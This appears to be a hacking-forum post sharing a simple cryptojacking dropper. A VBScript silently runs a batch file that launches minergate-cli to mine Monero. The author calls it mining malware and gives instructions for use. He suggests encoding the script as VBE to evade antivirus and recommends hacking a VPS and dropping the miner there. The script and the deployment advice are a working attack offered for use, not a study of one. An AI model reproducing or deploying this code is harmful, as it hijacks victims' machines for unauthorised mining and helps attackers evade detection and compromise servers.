Sign in to follow this  
MrLazy_inc.

XMR Mining using VBS as a igniter

Recommended Posts

[hide]

 

 

Set oShell = CreateObject ("Wscript.Shell")
Dim strArgs
strArgs = "cmd /c updater.bat"
oShell.Run strArgs, 0, false

 

[/hide]

 

So after it runs updater.bat which is 

 

[hide]

 

minergate-cli.exe -u [email protected] --xmr

 

[/hide]

 

[hide]

it start minergate and it use XMR mining method you can encrypt the VBS script and make it VBE to get around AV's.

it runs silently but it shows a process named minergate-cli but whatever it just a very simple script to get familiar with mining malwares

the best method that you can use is to hack VPS and drop it and again is not something to be wowed it's just a script i wrote before 2-3 years i plan to update it and make it 

proper XMR mining malware. On the batch script replace [email protected] with your email that you used to register at minergate. Name the bat script updater.bat.

[/hide]

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this